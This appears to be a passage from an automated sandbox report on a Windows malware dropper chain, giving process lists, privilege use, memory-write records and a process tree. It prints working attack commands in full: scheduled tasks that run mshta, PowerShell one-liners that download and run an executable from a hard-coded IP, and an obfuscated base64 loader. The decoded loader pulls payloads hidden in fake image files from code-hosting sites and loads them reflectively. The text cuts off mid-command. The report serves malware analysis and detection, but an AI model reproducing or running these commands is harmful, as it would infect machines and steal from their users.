pid Process 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 2864 rapes.exe 2768 powershell.exe 2768 powershell.exe 2768 powershell.exe 2936 TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE 960 powershell.exe 2064 powershell.exe 1524 powershell.exe 1728 powershell.exe 2716 powershell.exe 2812 powershell.exe 1728 powershell.exe 1728 powershell.exe 1440 483d2fa8a0d53818306efeb32d3.exe 1356 e024e105da.exe 1356 e024e105da.exe 1356 e024e105da.exe 1356 e024e105da.exe 1356 e024e105da.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 636 chrome.exe 636 chrome.exe 2472 65516ed6cf.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 3384 chrome.exe 3384 chrome.exe 3828 b43449a9e4.exe 3828 b43449a9e4.exe 3828 b43449a9e4.exe 3828 b43449a9e4.exe 3828 b43449a9e4.exe 3828 b43449a9e4.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 2936 221764ef7a.exe 3728 powershell.exe 3892 powershell.exe 2936 221764ef7a.exe 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com 3436 bd9c4316f2.exe 1244 4ad709baae.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 476 Process not Found 476 Process not Found -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeDebugPrivilege 1800 taskkill.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeShutdownPrivilege 636 chrome.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 2548 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 900 firefox.exe Token: SeDebugPrivilege 900 firefox.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeDebugPrivilege 3828 b43449a9e4.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeShutdownPrivilege 3384 chrome.exe Token: SeDebugPrivilege 3728 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeDebugPrivilege 3760 tasklist.exe Token: SeDebugPrivilege 4076 tasklist.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 2332 f037f0daf3.exe 2332 f037f0daf3.exe 2332 f037f0daf3.exe 636 chrome.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 900 firefox.exe 900 firefox.exe 900 firefox.exe 900 firefox.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 3384 chrome.exe 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2332 f037f0daf3.exe 2332 f037f0daf3.exe 2332 f037f0daf3.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 900 firefox.exe 900 firefox.exe 900 firefox.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 2472 65516ed6cf.exe 3292 Passwords.com 3292 Passwords.com 3292 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3036 wrote to memory of 2864 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 30 PID 3036 wrote to memory of 2864 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 30 PID 3036 wrote to memory of 2864 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 30 PID 3036 wrote to memory of 2864 3036 72d706281b940ed3b12e2c1d2cdc9e0b.exe 30 PID 2864 wrote to memory of 2332 2864 rapes.exe 33 PID 2864 wrote to memory of 2332 2864 rapes.exe 33 PID 2864 wrote to memory of 2332 2864 rapes.exe 33 PID 2864 wrote to memory of 2332 2864 rapes.exe 33 PID 2332 wrote to memory of 1716 2332 f037f0daf3.exe 34 PID 2332 wrote to memory of 1716 2332 f037f0daf3.exe 34 PID 2332 wrote to memory of 1716 2332 f037f0daf3.exe 34 PID 2332 wrote to memory of 1716 2332 f037f0daf3.exe 34 PID 2332 wrote to memory of 2112 2332 f037f0daf3.exe 35 PID 2332 wrote to memory of 2112 2332 f037f0daf3.exe 35 PID 2332 wrote to memory of 2112 2332 f037f0daf3.exe 35 PID 2332 wrote to memory of 2112 2332 f037f0daf3.exe 35 PID 1716 wrote to memory of 1780 1716 cmd.exe 37 PID 1716 wrote to memory of 1780 1716 cmd.exe 37 PID 1716 wrote to memory of 1780 1716 cmd.exe 37 PID 1716 wrote to memory of 1780 1716 cmd.exe 37 PID 2112 wrote to memory of 2768 2112 mshta.exe 38 PID 2112 wrote to memory of 2768 2112 mshta.exe 38 PID 2112 wrote to memory of 2768 2112 mshta.exe 38 PID 2112 wrote to memory of 2768 2112 mshta.exe 38 PID 2768 wrote to memory of 2936 2768 powershell.exe 40 PID 2768 wrote to memory of 2936 2768 powershell.exe 40 PID 2768 wrote to memory of 2936 2768 powershell.exe 40 PID 2768 wrote to memory of 2936 2768 powershell.exe 40 PID 2864 wrote to memory of 2556 2864 rapes.exe 41 PID 2864 wrote to memory of 2556 2864 rapes.exe 41 PID 2864 wrote to memory of 2556 2864 rapes.exe 41 PID 2864 wrote to memory of 2556 2864 rapes.exe 41 PID 2556 wrote to memory of 1296 2556 cmd.exe 43 PID 2556 wrote to memory of 1296 2556 cmd.exe 43 PID 2556 wrote to memory of 1296 2556 cmd.exe 43 PID 2556 wrote to memory of 1296 2556 cmd.exe 43 PID 2556 wrote to memory of 796 2556 cmd.exe 44 PID 2556 wrote to memory of 796 2556 cmd.exe 44 PID 2556 wrote to memory of 796 2556 cmd.exe 44 PID 2556 wrote to memory of 796 2556 cmd.exe 44 PID 796 wrote to memory of 960 796 cmd.exe 45 PID 796 wrote to memory of 960 796 cmd.exe 45 PID 796 wrote to memory of 960 796 cmd.exe 45 PID 796 wrote to memory of 960 796 cmd.exe 45 PID 2556 wrote to memory of 2128 2556 cmd.exe 46 PID 2556 wrote to memory of 2128 2556 cmd.exe 46 PID 2556 wrote to memory of 2128 2556 cmd.exe 46 PID 2556 wrote to memory of 2128 2556 cmd.exe 46 PID 2128 wrote to memory of 2064 2128 cmd.exe 47 PID 2128 wrote to memory of 2064 2128 cmd.exe 47 PID 2128 wrote to memory of 2064 2128 cmd.exe 47 PID 2128 wrote to memory of 2064 2128 cmd.exe 47 PID 2556 wrote to memory of 1520 2556 cmd.exe 48 PID 2556 wrote to memory of 1520 2556 cmd.exe 48 PID 2556 wrote to memory of 1520 2556 cmd.exe 48 PID 2556 wrote to memory of 1520 2556 cmd.exe 48 PID 1520 wrote to memory of 1524 1520 cmd.exe 49 PID 1520 wrote to memory of 1524 1520 cmd.exe 49 PID 1520 wrote to memory of 1524 1520 cmd.exe 49 PID 1520 wrote to memory of 1524 1520 cmd.exe 49 PID 2556 wrote to memory of 1028 2556 cmd.exe 50 PID 2556 wrote to memory of 1028 2556 cmd.exe 50 PID 2556 wrote to memory of 1028 2556 cmd.exe 50 PID 2556 wrote to memory of 1028 2556 cmd.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe"C:\Users\Admin\AppData\Local\Temp\72d706281b940ed3b12e2c1d2cdc9e0b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\10338550101\f037f0daf3.exe"C:\Users\Admin\AppData\Local\Temp\10338550101\f037f0daf3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn pFoIOma661r /tr "mshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn pFoIOma661r /tr "mshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1780
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\n247GGuU5.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Users\Admin\AppData\Local\TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE"C:\Users\Admin\AppData\Local\TempPTI4EMONM03TIM4TGWRMVCLOTK387W0L.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "fYZtVmanbXi" /tr "mshta \"C:\Temp\V5GxwI9zX.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1028
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\V5GxwI9zX.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1084 -
C:\Windows\system32\cmd.execmd.exe /c 67e2ff36de8a3.vbs4⤵PID:2688
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"5⤵PID:2984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@GI@awBt@EE@awBt@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' 